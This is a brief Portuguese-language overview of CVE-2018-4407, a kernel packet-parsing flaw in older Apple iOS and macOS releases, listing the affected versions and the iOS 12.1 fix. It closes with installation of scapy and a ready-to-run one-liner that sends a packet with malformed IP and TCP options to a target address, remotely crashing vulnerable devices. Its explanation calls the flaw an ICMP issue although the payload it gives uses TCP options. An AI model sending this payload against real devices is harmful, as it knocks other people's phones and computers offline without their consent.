
CVE-2018-4407 Visão geral e implementação
O princípio é tornar outros campos do pacote "icmp" ilegais. Quando o kernel macOS ou iPhone analisa, não implementa verificação de tamanho, causando um crash.
Apple iOS 11 e versões anteriores: todos os dispositivos
Apple macOS High Sierra (versão mais alta afetada 10.13.6): todos os dispositivos
Apple macOS Sierra (versão mais alta afetada 10.12.6): todos os dispositivos
Apple OS X El Capitan e versões anteriores: todos os dispositivos
A Apple corrigiu completamente esta vulnerabilidade no pacote de atualização "iOS 12.1" lançado em 30 de outubro.
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))